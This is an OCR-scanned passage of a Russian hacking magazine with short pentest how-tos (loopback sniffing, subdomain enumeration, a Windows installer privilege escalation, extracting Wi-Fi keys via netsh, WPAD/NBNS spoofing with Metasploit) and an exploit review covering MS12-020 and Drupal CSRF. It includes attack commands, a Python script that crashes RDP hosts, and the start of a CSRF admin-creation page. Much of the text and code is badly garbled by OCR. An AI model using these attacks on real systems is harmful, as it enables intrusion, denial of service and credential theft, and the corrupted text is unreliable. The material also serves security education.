работает. Однако тут встает проблема — и серверная, и клиентская 
часть по тем или иным причинам находятся на одном и том же хо- 
сте. И вроде бы все ничего, но в ѴѴіпсІоѵѵз существует классическая 
багофича: ІоорЬаск-интерфейс прослушать «нельзя». Сейчас мы 
увидим, как это можно обойти. Для начала немного теории. 

ІоорЬаск-интерфейс — это виртуальный сетевой интерфейс. 
«Любой трафик, который посылается компьютерной программой 
на интерфейс ІоорЬаск, тутже получается тем же интерфейсом», 

— говорит нам Википедия. То есть это специальный интерфейс, 
часто используемый для общения компьютера «самого с собой». 

В ІРѵ4 подсеть от 127.0.0.0 до 127.255.255.255 — это ІоорЬаск. Дан- 
ный интерфейс присутствует у всех ОС, но проснифать трафик на 
нем бывает не так-то уж и просто. К сожалению, всем известный 
драйвер ѴѴіпРсар этого не позволяет, поэтому ѴѴігезЬагк не покажет 
тебе трафик на ІоорЬаск'е. Так что же делать? Здесь есть несколько 
вариантов: 

1. Как ни странно, проблемы прослушки ІоорЬаск'а, по сути, нет. 
Есть проблема ѴѴіпРсар'а, чья модель внедрения в ОС не по- 
зволяет этого делать. Но так как на ѴѴіпРсар'е работают очень 
многие сниферы, то у народа складывается не совсем правиль- 
ное мнение о винде. То есть если использовать снифер, который 
взаимодействует с ОС другим методом, то проблема решится. 

В качестве примера можно взять РаѵѵСар ( доо.дІ/ѴСхЫМ ). Он 
очень маленький и напрямую работает с гаѵѵ-сокетами винды. 
Однако у него есть и свои тонкости: ІоорЬаск можно снифать 
только под ѴізІа/7, а под ХР — нельзя (зато снифинг на уда- 
ленные хосты под ХР работает нормально). Кстати, еще можно 



воспользоваться каким-нибудь триальным платным снифером 
вроде СоттѴіеѵѵ І доо.дІ/у52тУ ). 

2 . Несколько кривой, но все же метод. Нужно всего лишь разнести 
клиент и сервер по разным хостам. Может показаться, что это 
нарушаетусловия задачи, но нет! Используя портфорвардинг, 
мы можем сделать насильный редирект. Но схема совсем не 
проста. Клиентом коннектимся на первый портфорвад, он пере- 
кидывает трафик с петли на какой-то внешний хост, где будет 
еще один форвардинг — обратно на первый хост, но уже на дру- 
гой порт, который, в свою очередь, сделает редирект трафика 
уже на настоящий сервер. 

3. Последний и самый легкий метод — это махинация с таблицей 
маршрутизации в ОС. Весь трафик, идущий на ІоорЬаск, мы 
перенаправим на шлюз, который вернет данные обратно к нам. 
Мне кажется, что это лучший метод, хотя у него и есть несколь- 
ко недостатков. Во-первых, входящие пакеты будут дубли- 
роваться (но они отмечаются в ѴѴігезЬагк'е, а потому особых 
проблем не возникнет). Во-вторых, если данных на внутреннем 
интерфейсе много, то можно прилично забить канал. Я прово- 
дил тесты на виртуалке с виртуальным роутером, и проблем не 
было. На практике все выглядит следующим образом: 

Добавляем основной маршрут (редирект ІоорЬаск'а) 

гои1:е асісі <твой ІР> шазк 255.255.255.255 \ 

<основной шлюз> теіігіс 1 

После работы удаляем лишнюю запись 

гоиііе сІе1е1:е <твой ІР> 

Подробности про ІоорЬаск-интерфейс и трудности прослушивания 
данных на нем можно прочесть в вики ѴѴігезЬагк'а ( доо.дІ/ВЗѵЕЗ ). 




После небольшой корректировки роутинга мы можем видеть трафик 
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ВЗЛОМ/ ЕА5ѴНАСК 



ПОЛУЧИТЬ ПОДДОМЕНЫ ХОСТА 

С помощью поисковиков 



ЗАДАЧА 



РЕШЕНИЕ 

В прошлом номере мы обсуждали необходимость получения до- 
менов и поддоменов для проведения пентеста какой-либо орга- 
низации, а также те бонусы, которые все это может нам прине- 
сти. Однако в интернете у нас есть две проблемы: сама операция 
трансфера зоны разрешена редко, плюс мы не можем получить 
виртуальные поддомены, которые создаются и управляются 
веб-сервером. А ведь на них многое держится, и узнать их очень 
хочется. Для решения данной проблемы мы можем воспользо- 
ваться двумя методами. Самый примитивный — это перебор по 
словарику возможных имен поддоменов. Модули для перебора 
присутствуют почти во всех известных сканерах (ѵѵЗаС птар, 
М5Г). Другой — воспользоваться хаками поисковых машин: 

1. В микрософтовском Віпд'е есть интересный параметр «ір:». Он 
возвращает все домены, которые привязаны к введенному ІР- 
адресу. С помощью него виртуальные хосты находятся очень 
просто. Но здесь кроется один минус — привязка к конкрет- 
ному ІР (ведь не всегда все поддомены сидят на одном и том 
же адресе). 

2. В Гугле мы можем воспользоваться интересной техникой для 
поиска поддоменов. Авторство метода за людьми из 5АІМ5 



(может быть, все-таки авторство за Гуглом? — Прим. ред.). 

Для реализации техники нам потребуется параметр «вііе:» 
и последующий фильтр по ответам от Гугла. Например, для 
поиска поддоменов *.тісго5о(Т.сот мы должны выполнить 
следующие шаги: 

1. Запрашиваем «5ІІе:тісго5о(Т.сот». 

2. Из ответа получаем поддомены ѵѵіпсіоѵѵз.тісгозой.сот 
и ѵѵѵѵѵѵ.тісгозой.сот. 

3. Повторяем запрос, но уже без найденных доменов: 
«5ІІе:тісго50ІЧ.сот — 5ІІе:ѵѵіпбоѵѵ5.тісго50ІТ.сот — 
зіІе:ѵѵѵѵѵѵ.т іеговой. сот». 

Думаю, ясно, что вручную делать такое бессмысленно, поэто- 
му пентестер под ником І_аІ\ІМа5іеР53 уже автоматизировал дан- 
ный процесс в своей тулзе ЗеагсЬ Епдіпе Оотаіп Тгапвіюг ( доо.ді/ 
иВАОо ]. Получился хороший инструмент для сбора поддоменов. 
Но у него есть два минуса. Во-первых, поддомены должны быть 
проиндексированы. То есть если админ сайта не засветил поддо- 
мен в поисковике, то мы его и не найдем. Во-вторых, количество 
фильтров в Гугле ограничено числом 30, поэтому более тридцати 
поддоменов найти уже трудно. Но таких организаций немного. 




Поддомены мелкомягких (найдены в Соодіе для *.тісго5оН.сот) 
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ЕА5У НАСК 



ВЫБРАТЬ ЦЕЛЬ ДЛЯ ПЕНТЕСТА 



ЗАДАЧА 



РЕШЕНИЕ 

Вот изучаем мы техники «взлома», изучаем... Но это все теория, 
а ведь чтобы поднимать свое мастерство, надо тренироваться. 
Конечно, лучшее в данном случае решение — это всевозможные 
тестовые стенды. В Сети есть множество образов ЫѵеСО, предназна- 
ченных специально для взлома, также есть всевозможные конкурсы 
и квесты, где можно прокачать свои скиллы. Но все же это не- 
сколько далеко отжизни. Если естьжелание сразиться с реальным 
противником, что делать? Можно, конечно, взять любой сервер/сайт/ 
организацию в интернете и попробовать взломать их, но это попахи- 
вает проблемами с правоохранительными органами. Иное решение 
— это ломать сайты, которые сами дали разрешение на проведение 
таких мероприятий: этот список не ограничивается Гуглом и Фэйсбу- 
ком. К тому же, в случае успеха авторитетная ссылка в НаІІ о* Еате 
гарантирована, а иногда возможна и финансовая выгода. Итак, сей 
примечательный список можно взять в блоге Дэна Камински ( доо.ді/ 
Щг5і). Альтернативный и более часто обновляемый список держит 



Кристиан Генрих (СЬгіз*іап НеіпгісЫ: доо.д1/ѴУзЬ72 . Только помни, что 
в общем случае политики данных сайтов не разрешают проводить 
«злые атаки» (например, ДоСы и переполняшки). 




Веб-приложение йѴѴѴА специально для тренировки навыков взлома 



ИСПОЛЬЗОВАТЬ О-ОАУ В ѴѴІЫ00ѴѴ5 7/2008 
ДЛЯ ПОВЫШЕНИЯ ПРИВИЛЕГИЙ 



ЗАДАЧА 



РЕШЕНИЕ 

Не так давно ІОАсІіѵе Ьабз РезеагсЬ ( іоасііѵе.сот ) на конференции 
ВІаск На* II 5А 2011 поделились с народом своими изысканиями 
в области поиска уязвимостей под ѴѴіпсІоѵѵз. Ведь на самом деле для 
поиска многих багов не требуется фаззинг или реверс-инжиниринг. 
Все гораздо проще, и чаще всего необходим только лишь дежурный 
набор софта и техник от Марка Руссиновича. Как, например, ОН 
Нуаскіпд, для поиска которого требуется всего лишь Ргосезз Мопі*ог. 
Пускай ОН Нуаскіпд и не дасттебе собе ехеси*іоп на удаленной 
системе, к которой у тебя нет доступа и которая находится за файр- 
волом и вообще отключена и спрятана в сейф. Но ведь это не всегда 
необходимо :). 

ѴѴіпсІоѵѵз содержит очень большое количество компонентов, 
которые должны взаимодействовать между собой, а кроме того, мно- 
гие скрытые фичи таятся в ее недрах. Не говоря уже о компонентах 
и утилитах сторонних производителей. Особенно отечественных. Но 
об этом мы подискутируем как-нибудь в другой раз. В общем, воору- 
жаемся презентацией от І0Ас*іѵе под названием «Еазу апб циіок 
ѵиІпегаЬіІі*у Ьип*іпд іп ѴѴіпсІоѵѵз» ( доо.д 1/5И 634 ) и бегом на поиск дыр. 

Но сначала вернемся к нашей задаче. І0Ас*іѵе нашли 0-бау, 
позволяющий поднять свои привилегии в системе с обычных до 
системных. Жаль, что воспользоваться им может разве что Чак Нор- 
рис :). Но не буду торопить события. Что же они там изыскали? Итак, 
в ѴѴіп7/2008 есть папка «С:\ѴѴіпсІоѵѵ5\Іп5*аІІег\», в которой хранятся 
установочные файлы под случайными именами отуже установ- 
ленного ПО. Когда какой-то пользователь запускает их (например, 
МісгозоіТ ОІТісе РиЫізЬег М II I 2007), они автоматически поднимают 
свои привилегии для установки. Но так как ПО уже установлено, то 
и проблемы вроде бы никакой нет. Далее исследователи обнаружи- 
ли еще один интересный факт. Во время запуска и установки такой 
инсталляшки в папке «С:\ІІ5ег5\%и5егпате%\Арр0а*а\ЕосаІ\Тетр\» 
(то есть папка «Тетр» для запустившего инсталляшку пользова- 
теля) автоматически создается временный файл с именем Нх????. 



*тр (здесь ???? — это рандомные Ьех-значения). Этот таинствен- 
ный файл представляет из себя библиотеку МісгозоІТ Неір Оа*а 
Зегѵісез Мобиіе, обычно она именуется как НХ05.6ІІ. Дальше данная 
библиотека подгружается отвечающим за установку процессом 
«тзіехес.ехе», который, в свою очередь, имеет привилегии 5уз*ет 
в системе. Яхууу! По идее, нам остается лишь запустить инстал- 
ляшку и быстренько подменить временную бІІ'ку — к примеру, на 
наш те*егрге*ег (ведь бІІ'ка лежит в папке, для которой у нас есть 
права на запись), и готово, мы — 5уз*ет. Но, увы, все не так просто. 
Проблема в том, что «тзіехес.ехе» сравнивает М05-хеш библиоте- 
ки перед ее загрузкой в память с базой хешей, полученных из «С:\ 
ѴѴіпсІоѵѵ5\Іп5*аІІег\». То есть нам не просто нужно быстро подменить 
Нх????.*тр на ядовитую сІІГку, а еще и позаботиться о том, чтобы ее 
Мйб-хеш совпал с Мйб-хешем оригинала. Аэто задача не из легких. 
Однако не все так плохо, здесь нам может пригодиться материал про 
нахождение Мйб-коллизий из апрельского номера журнала. Кстати, 
аналогичная ситуация наблюдается и при установке апдейтов. Здесь 
рандомный файл создается в папке «С:\ѵѵіпсІоѵѵ5\*етр». Ну и на- 
последок — видео, подтверждающее описанный способ поднятия 
привилегий (без генерации МР5, конечно): доо.дІ/АтЬхх . 




После запуска инсталляшки привилегии поднимаются до Бувіет 
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ПОЛУЧИТЬ КЛЮЧ ДЛЯ ПОДКЛЮЧЕНИЯ К ѴѴІРІ-ТОЧКЕ 
В ОТКРЫТОМ ВИДЕ 



ЗАДАЧА 



РЕШЕНИЕ 

Давай возьмем среднестатистическую ѴѴіРі-точку. Защищена она 
ѴѴРА2, и возможные атаки против нее — это перебор. Если нам по- 
везет, то на ней будет включен ѴѴР5 и мы сможем пробрутфорсить 
РІІМ-код. Но если не повезло и там длинный ключ, то перебирать 
придется очень долго. Но всегда ли так уж необходимо идти в лоб? 
Нет :). Можно, например, добраться до одного из клиентов данной 
точки и после его взлома продолжить атаку уже на сам ѴѴі-Рі. Но 
обо всем по порядку. 

В ѴѴіпсІоѵѵз Ѵізіа и выше была подчистую переделана подси- 
стема беспроводной связи. Среди нововведений появилась такая 
вещь, как профили беспроводных сетей. Пользователю стоит один 
раз подключиться к сетке, ввести Р5К-ключик и все. Для следую- 
щих подключений даже не потребуются админские права в ОС. 
Кроме того, подключения могут выполняться автоматически. Все 
необходимые данные хранятся в самой ОС. Что еще интересно, 
пользователь системы может получить ключ для подключения 
к точке ѴѴі-Рі в открытом виде. Для этого потребуется: 

1. Перейти: «Панель управления -> Сеть и Интернет -> Управление 

беспроводными сетями». 

2 . Выбратьнеобходимый профиль -> «Свойства». 

3. «Безопасность^ Отобразить вводимыезнаки». 

Вот только проблема: чтобы увидеть символы, нам требуются 
админские привилегии в ОС, а это совсем не круто. Ріо постой! Иссле- 
дователь Джошуа Райт розЬиа ѴѴгідМ) написал интереснейший ѵѵЫіе 
рарег «Ѵізіа ѴѴігеІезз Роѵѵег Тооіз Іюг іЬе Репеігабоп Тезіег» 
(доо.дІ/кВ22х ). где рассказал про всяческие вещи, которые могут 
помочь пентестерам. Одним из трюков является как раз решение 
нашей задачи. Причем все происходит в рамках модели безопасности 
ѴѴіпсІоѵѵз. Итак, нам потребуется консоль и одна виндовая команда — 
пеІзЬ. Для начала давай посмотрим, какие профили ѴѴіРі-сеток есть 
в ОС: «пеізб ѵѵіап зИоѵѵ ргобіез». Хорошо, но что дальше? В ѴѴіпсІоѵѵз 
есть прекрасная возможность экспорта/импорта настроек для профи- 
лей. Сделано это для упрощения самого процесса — один раз настро- 
ив все, мы можем экспортировать профиль, а затем импортировать 
его на остальных машинах. Что еще интереснее, для этих целей нам 
не потребуются админские права в ОС. Далее выбираем интересую- 
щий нас профиль и экспортируем его: 

пеіізіі ыіап ехрогЕ ргоб і е пате="инте р есующ ий_п рофиль " 

Если посмотреть внутрь полученного ХМІ_-файла, то мы увидим, 
что он не дает ничего особенного. Р5К-ключ зашифрован АЕЗ'ом. 
Но Джошуа не велит унывать: ведь если мы импортируем данный 
профиль уже в своей ОС, то и расшифровывать ничего не надо — 
подключиться можно и так. Для импорта профиля нам потребуется 
ввести следующую команду в своей ОС: 




Экспортируем ѴѴіРі-профиль. Внутри — настройки и зашифрованный ключ 
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Получаем ключ от ѴѴі-Рі в открытом виде 

пеіізіі ыіап асісі ргобіе пате="интересующий_профиль" 

И все. Как только мы достигнем зоны атакуемой ѴѴіРі-сети, 
наша винда сама все расшифрует и подключится. Но так как 
цель — это ключ открытым текстом, то взять его можно в том же 
месте: «Безопасность -> Отобразить вводимые знаки», воттолько 
теперь у нас уже будут админские привилегии. 



ПУСТИТЬ КЛИЕНТА ЧЕРЕЗ ПОДДЕЛЬНЫЙ ПРОКСИ 



ЗАДАЧА 



РЕШЕНИЕ 

В позапрошлом номере я писал про такую древнюю атаку, как 
пеіЬіоз пате зрооПпд. Хоть она и давно всеми забыта, но поюзать ее 
еще можно. С одним из способов такого использования этой атаки 
мы сейчас как раз и познакомимся. 



Если ты часто используешь ѴѴігезЬагк (особенно в виндовых 
сетях), то, наверное, замечал некие широковещательные запросы 
от одних хостов в поисках какого-то другого хоста с именем ѴѴРАБ. 
Если нет, то в данном контексте ѴѴРАй — это специальный сервер. 

А вообще ѴѴРАР — технология, которая расшифровывается как ѴѴеЬ 
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Ргоху Аиіотаііс Оізсоѵегу, то есть протокол автоматической на- 
стройки прокси. Предназначена она для того, чтобы не настраивать 
прокси на каждом конкретном хосте, таким образом хост автомати- 
чески получает прокси-сервер. Как понимаешь, здесь-то и появля- 
ется человек в маске и подставляет поддельный прокси. Но давай 
по порядку и в подробностях. 

Во-первых, чтобы технология заработала, в сети должен быть 
хост ѴѴРАО, у которого на 80-м порту открыт специально настроен- 
ный веб-сервер. Данный хост должен возвращать баі-файл с МІМЕ 
Іуре «арріісаііоп/х-пз-ргоху-аиіосопічд». Сам файл настроек должен 
называться ѵѵрасЫаС В этом файле хранятся настройки прокси для 
браузера в виде ІаѵазсгірС Например, такие: 

-Рипсіііоі РіпсІРгохуРогІІКЦигІ., бозі:) 

геіигп "РКОХУ ргоху. ехашріе. сот: 8080; РІКЕСТ"; 

ь_ 



Здесь ргоху.ехатріе.сот — это прокси браузера для всех ІІРЕ. 
Чтобы найти ѴѴРАО-сервер, можно использовать соответствую- 
щую запись и йНСР ответа, а также можно поискать по имени 
(0Ы5, ѴѴІ N5, ЫВЫ5, Ьозіз, ІтЬозІз]. Учтем, что данная последова- 
тельность выстроена по приоритету. Кстати, при поиске сервера 
по 0Ы5-имени происходит интересная ситуация. Хост, взяв свое 
доменное имя, по очереди отнимает поддомен и заменяет его 
на ѵѵраб. То есть, например, для хоста с именем «рс.берагІтепС 
ЬгапсЬ. ехатріе. сот» поиск конфигурационного файла будет про- 
исходить следующим образом: 

біір : //мрасі . сіерагітепі: . Ьгапсб . ехатріе . сот/мрасі . сІаТ 
біір : //мрасі . Ьгапсб . ехатріе . сот/мрасі . сіаі 
ІтЫр : //мрасі . ехатріе . сот/ырасі . сіаі: 

ІгЕЕр : //мрасі . сот/щрасі . сІа~Е 

Здесь небольшая оговорка: ІІРЕ ѵѵраб.сот/ѵѵрасі.сіаі запраши- 
ваться не будет, поиск остановится на предыдущем поддомене 
(мелкомягкие выпустили соответствующий патч). Но это касается 
только зоны .сот. Что это дает? Если зарегистрировать такой поддо- 
мен, а также если в атакуемой организации не используется прокси, 
то пользователи этой организации придутза прокси к нам. Теперь 
о поддержке. ѴѴРАО поддерживается всеми основными браузерами, 
причем СЬготе и 5а1агі используют настройки из ІЕ. Находятся они 
по следующему пути: 

1. «Меню Сервис -> Свойства обозревателя». 

2. «Подключения -> Настройки сети -> Автоматическое определе- 
ние параметров». 



Спзйстіі вбсэрштслр 
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Также интересным является и тот факт, что галка «Автоматиче- 
ское определение параметров» стоит по умолчанию у всех популяр- 
ных версий винды (хотя эта информация и не до конца проверена). 

То есть по дефолту многие пользователи работают при включенном 
ѴѴРАО'е, причем без проблем (пока ѴѴРАО не найден, используется 
прямое соединение), что существенно увеличивает вероятность 
проведения атаки. 

Если же мы находимся в той же сети, то подделать ѴѴРАО можно 
различными способами: это и атаки на йНСР, и 0І\І5-спуфинг. Но 
самым тихим и не требующим агр-спуфинга методом является 
ІЧеіВіоз-спуфинг. Как уже было сказано выше, в какой-то момент 
хост клиента прибегает к широковещательным ІЧеіВІОБ-запросам 
на поискѴѴРАО, чем мы и можем воспользоваться. Для практики нам 
потребуется М5Е. Настраиваем ѴѴРАО-сервер путем загрузки модуля 
для эмуляции ѴѴРАО и его последующего запуска: 

изе аихі1іагу/зегѵег/сар1:иге/ІтІ:1:р 
гип 

Нельзя не упомянуть, что помимо эмуляции ѴѴРАО этот модуль 



Включаем ѴѴРАО для ѴѴіпсіоѵѵб 

М5Е перегружен другим функционалом, так что куда правильнее 
использовать настоящий веб-сервер. 

Далее запускаем ІЧеіВІОВ-спуфинг и ждем жертв: 

# Загружаем модуль для ІМеІіВІОБ-спуфинга 

изе аихі1іагѵ/5роо-Р/пЬп5/пЬп5_ге5роп5е 



# Выставляем регексп, на какие запросы отвечать 
5е* КЕ6ЕХ *ырасІ* 



# Указываем, какой ІР-адрес подставлять 
зеі: зрообр Ііаскег.ір.асІсІгезБ 



# Запускаем 

пип 

Более подробную информацию о связанных с ѴѴРАО атаках мож- 
но почерпнуть у Сергея Рублева ( аоо.аІ/Сѵдіх ). ЗЕ 
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ВЗЛОМ/ОБЗОР ЭКСПЛОЙТОВ 



Павел Александрович (іѵіпзісІе.ЫодзроСсот) 
Дмитрий Михайлович (115612, дер. Красная звездочка, д. 1) 
Александр Матросов, Зепіог таіѵѵаге гезеагсНег, Е5ЕТ 



-Вы готовы, дети? 
-Да, Капитан! 

-Я не слышу! 
-Такточно, Капитан!!! 



Обзор 

ЭКСПЛОЙТОВ 




^ М512-020: разведение КйР-червей 



СѴ35Ѵ2 9.3 



(АѴ:М/АС:М/АІІ:І\І/С:С/І:С/А:С) 

В первый вторник марта МісгозоЙ выпустила очередную порцию 
патчей, и, казалось бы, все уже привыкли к этому и ничего при- 
мечательного в этом событии нет. Исследователи, как обычно, 
расчехлят ЮА Рго и ВіпОіІТ/РаІсЬОіІТ и будут искать интересные 
нюансы уже закрытых уязвимостей. Но этот вторник отличало от 
множества других то, что среди исправленных уязвимостей был 
магический бюллетень под номером М512-020. Именно эта по- 
следовательность символов на несколько недель стала святым 
Граалем для ресечеров со всего мира, а критический статус лишь 
придал пикантности этой активности. 

і шъ\и 

Почему же все так засуетились? Ответ довольно прост: этот 
бюллетень закрывает целых две уязвимости РйР-клиента, а 
одна из них потенциально позволяет выполнить произвольный 
код на удаленной системе при помощи специально сформиро- 
ванного РОР-пакета. Ну и вдогонку: данной напасти подвержены 
все актуальные версии М5 ѴѴіпсІоѵѵз, в том числе и 64-битные 
версии. В рамках патча М512-020 было закрыто две уязвимо- 
сти: СѴЕ-2012-0002 (РСЕ в РйР) и С ѴЕ-20 1 2-0 1 52 Шо5 в ТегтіпаІ 
Бегѵег). Нас больше интересует первая, так как она потенциаль- 
но гораздо опаснее и может повлечь за собой появление сетевых 
червей, которые будут ее активно эксплуатировать (на данный 
момент о случаях ее использования во вредоносных программах 
нам неизвестно). 

Кстати, относительно недавно уже закрывалась уязвимость 
М511-065 (август 2011-го), которая позволяла осуществлять Ро5 



(ѴѴіпХР/2003) и была замечена в том же драйвере гсірѵѵсі.зуз, в 
котором была найдена СѴЕ-2012-0002. Эти изменения можно 
отследить по временным меткам в гсірѵѵсі.зуз до и после патча, 
а также в официальных списках изменений для М511-065 и для 
М512-020. Собственно, после патча основные изменения на- 
блюдаются в функции НапсІІеАиасЫІзегРецП. При сравнении ис- 
правленного драйвера и драйвера до патча можно заметить, что 
изменений было произведено не так уж и много. А при использо- 
вании ВіпОіИ это довольно наглядно отображено в виде графа. 
Видно, что добавлена дополнительная проверка и освобождение 
памяти при помощи ЕхРгееРооІѴѴШпТадО. Что же именно было 
добавлено? 




Добавлена дополнительная проверка и вызов ЕхГгееРооІѴѴіІНТадИ 
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Обзор эксплойтов 



СИіг' ЫіІіСІІІ ИЛЛ4І-ГЙІС ІСГаІІЧ^г'Й^іЦІЛі: I ИИ І ІЛЕ Л? . Ь ПТ ,я а } 

{ 

йп( ѵЭ; // НІОІ 

ІВТ ііі; // ►дхигэ 

іпт чы // I ар-0^| [Ьр-івп]ін 

січлг ч?; // [%р- 'ігі| ( Гі |! І^]РЭ 

іпт ѵз : (ір- 8 п| [пр-іп]^ 

ІПІ У?: /У 1^р>С1|] [Ьр *|я]Д? 

мэ ■* е іі і ■. ; 

*ЛЭ ■ 1; 

і> ( Ц(_И-ѴГР "}(ЫІ5 * 1^5 Г, ІЬсѴВ ) 

і 

нйііе { [мВиГГегй11ік{*( мть -ща, Н, 1, 11, 1ь Лив ] ) 



■.« іі ы ІІСіі Аі 1.-йсМи^г «' П и цира-1, [иЗ г (I. іі. 0. Лив. Ьѵ? . [сН-а 
ай в .(_[инисі ■ >< и-» + Ій?' 
и ( и*~> 

( 

С№і?ВГЙ:кііѴ««гСфп(1Чі я Г», а» иб); 

"4_оиі>т> т го - 

> 

»■ і ^ 

< 

ІИі* л Г р-ВТ Т іс пи С^г і: п пЦ II . 1, - < _&иОЙ& ид им + 1?} в ий); 

-(_пиіыш в] с щіч + гп} 11 - 
*«“® ѴТЕ -Нѵв 4 1) * О? 

} 

ІР С З&^ВиІВиРСѵЗ. < 0 > 

^ііЕіиргюи^ііз * іі?. не, й^в>: 

* 

ГсЬмгщ 1; 



• УМ ш Э 1 ; 



Гиііг _ІЛ] 1 л іі I ІІ.п .М I -г ГПІ .м Р ІІ\ и ■ Ир :|] шГ Г Іі 1->_ , іиІ л і 1 л I інГ >3 ^ 

ІпІ ѵЗ; и ГЕІН1 
I м! /У гн»Д1 

і иг и 6 - // [?р-чп) [ир- іВгъ]А2 

г»ілг и Р ; ..'/ •. |І Іі р [Іф і: Г* ]■:■».! 

«■ ии і :■ г : // \ •. р » •- м ] [пр ч * \ у : 

ІпГ Ѵ 9- Я // |^ + 1 Ѵі 1 [Ь*-№]№ 

ѵЗ - ІГнс; 

В|(_ЙЧЙ1* О-аЗ * и 
И [ “і_Уун -н(Ш ‘ іфэ & Нн?д > 

I 

чіт* 4 ІсШіі т*гіШи(-*^іиіинс в? мт, в. і, и, п, і у 

мА - НОііІІІ^гГіЫкРгПР^ііе-зИм^. й. О, а, ЬР. Ли ^ , [сіыц* «]Г.-аі ^ Э? 
мй - ч_&иияв -мѵѵ ■ і*з р 
І* І чш з 

с 

Ггр лЕ иДМ >і Іі: ->.пг ГмійГ Я 1 . И. □, и Л у - 

*1 йУяЗйр 1 2 п I - м 5 

> 

ГІН 

і 

Сгн1сА1!аг11в»г{|Ш(4| -[(_йЯЧІИр ■ 3}, 

-!_ящікр -!іѵУ - ІВ} ■ 11 ; 
вП_0Ѵ1Г *}Р * 4] - «; 

к 

ІІ ( ?гіі4ПиІ ПиР^нЗ, -Г П |і 



І 



ЫЫНгпмѵрІиМ ■ 117. г р р.К і ; 
іі І Р * 
і 

н І **(^«ТГ ->Г ■ ЗІ У 
ііг - . й*: 

] 



НапсIIеА^^ас^1^5егРе^() до патча 



НапсІІеАНасІіІІзегКедО после патча 



Был добавлен код на получение нулевого указателя и в 
случае этого безопасный выход и очистка пула памяти. Но, есте- 
ственно, всех, кто копал эту уязвимость, интересовал лишь один 
вопрос — насколько реально сделать эксплойт с удаленным вы- 
полнением кода. СЬаоикі Векгаг (генеральный директор ѴІІРЕІМ) 
сказал по этому поводу в своем твиттере: «Написание удаленно- 
го эксплойта для М512-020/РОР для ѴѴіп7 — однозначно вызов 
для Чака Норриса или Стивена Сигала». Основная проблема в 
том, что в данном случае написать стабильный эксплойт крайне 
сложно из-за особенностей обработки РйР-пакета внутри уяз- 
вимого драйвера. Вообще, сам протокол РйР имеет чрезвычайно 
непростую структуру. В итоге максимум, что удалось выжать на 
данный момент многочисленным исследователям этой уязвимо- 
сти, — это йо5 в уязвимом драйвере. 

Эксплуатируется уязвимость довольно просто: нужно послать 
на порт, на котором висит РйР, специально сформированный 
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Ро5 в уязвимом драйвере 



РОР-пакет, который, в свою очередь, устроит вам незабываемое 
свидание с синим экраном. Если естьзаранее подготовленные 
данные для отправки, то несложный скрипт на питоне поможет 
нам закончить начатое: 

ітрогЕ Боскеі: 



-Р = ореп( ' рас кеі:. Ьіп ' . 'г') 
раскеі: = -Р.геасІ() 

■Р.сіоз е 



5 = зоскеіі. зоскеі: (зоскеІі.АР ІМЕТ. зоске1=.$0СК_$ТКЕАМ) 

5 . соппесі: ( ( "%ТАК6ЕТ ІР АРРКЕ55%" , 3389) ) 

5 . зепб (раскеі:) 
сіаіга = 5 . ге сѵ(4Ѳ96^ 

Луиджи Аурьемма (Биіді Аигіетта) был первым человеком, 
который нашел эту уязвимость и отправил ее в 2йІ (201-12- 
044]. Такого рода уязвимости вызывают всегда очень большой 
интерес общественности и исследователей: РйР используется в 
любой корпоративной сети, а появление подобного червя могло 
бы вызвать эффект, очень близкий по своим масштабам к произ- 
веденному нашумевшим червем СопЛскег. Конечно, нельзя быть 
абсолютно уверенными, что невозможно создать РСЕ-эксплойт. 
Но в данном случае для написания рабочего эксплойта тре- 
буется масса усилий, которые явно не будут компенсированы 
финансово дальнейшей продажей Ібау-эксплойта. Для целена- 
правленных атак он уже не интересен, для публичных эксплойт- 
фреймворков слишком трудозатратен, а для наборов эксплойтов 
слишком дорог. 



ТАКѲЕТ5 



Все актуальные версии ѴѴіпсІоѵѵз. 



оилюы 



Установить патч М512-020. 
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Множественные С5КР в ОгираІ СМ5 



СѴ55Ѵ2 



6.5 






(АѴ:Ы/АС:І_/АІІ:5/С:Р/І:Р/А:Р) 



ОгираІ — заслуженный ветеран на рынке систем управления кон- 
тентом: проект развивается с далекого 2000 года. За это время он 
претерпел значительные изменения, сейчас его исходники весят 
более 11 мегабайт. Было ясно, что в таком количестве кода рано 
или поздно найдутся баги. Сегодня я опишу несколько уязвимо- 
стей, найденных исследователем Іѵапо ВіпеШ, которые позволяют 
получить доступ к административному интерфейсу этой СМ5. 



ЕХРЮІТ 



Чтобы обезопасить изменения, вносимые администраторами или 
пользователями через административный интерфейс, ОгираІ 
использует параметр 1огт_1океп, который передается в каждом 
Р05Т- запросе к серверу. Уязвимость присутствует в коде, отве- 
чающем за генерацию этого самого токена для родственных опе- 
раций в рамках одной сессии. При этом генерируется одно и то же 
значение параметра 1югт_ісІ. Примером такой ситуации может слу- 
жить создание новой статьи через административный интерфейс. 
Другой баг находится внутри параметра 1огт_ЬиісІ_ісІ, который 
используется для запроса статуса в процессе некоторых операций. 
Этот параметр генерируется заново при каждой новой операции 
администратора или пользователя, но ОгираІ допускает исполь- 
зование любого ранее сгенерированного идентификатора (вроде 
такого: 1огт-0іРцио1Т1ииЗ_иѵѵХРІ\ІсІѴІс_09КІ_20о2Е15сІК9ЬхиСі8), 
при этом действие в админке выполнится без каких-либо проблем. 
Эти недостатки могут быть использованы атакующим, который 
знает значения параметров 1огт_ЬиісІ_ісІ и 1огт_1океп. Напри- 
мер, внутренний злоумышленник, реализующий атаку Мап іп ТЬе 
МібсІІе, или внешний атакующий, получивший доступ к компьютеру 
легитимного пользователя/администратора. Баг может быть ис- 
пользован для создания специальной веб-страницы, при заходе на 
которую автоматически могут произойти абсолютно любые измене- 
ния в ОгираІ: добавление/удаление администратора, добавление/ 
удаление веб-страниц — все зависит от намерений злоумышлен- 
ника. Кроме вышеописанной баги существуют еще несколько кося- 
ков, также связанных с недостаточной проверкой сессии. Один из 
них находится в <бгираІ_ір>/изег/Іодои1 и позволяет атакующему 
создать специальную веб-страницу, зайдя на которую администра- 
тор (или пользователь) автоматически выйдет из ОгираІ. Эта стра- 
ница может быть использована для перехвата пользовательских 
реквизитов при реализации атаки Мап іп ТЬе МібсІІе. Кроме того, 
ОгираІ не проверяет, разрешены ли методы СЕТ или Р05Т, поэтому 
предыдущую атаку можно проделать и через Р05Т-запрос. 




Ну и последнее — ОгираІ не проверяет значения параметра «Ыір 
геіегег», делая возможным реализацию вышеописанных атак. 

Эксплойт для добавления администратора выглядит следую- 
щим образом: 

<И1:т1> 

<ЬосІу оп1оасІ="даѵа5сгір1: ісіоситепі: .-Рогт5[Ѳ] . зиЬтііО "> 
<Н2>С5КР Ех ріоіі: сбап§е изег іо асІтіп</Н2> 

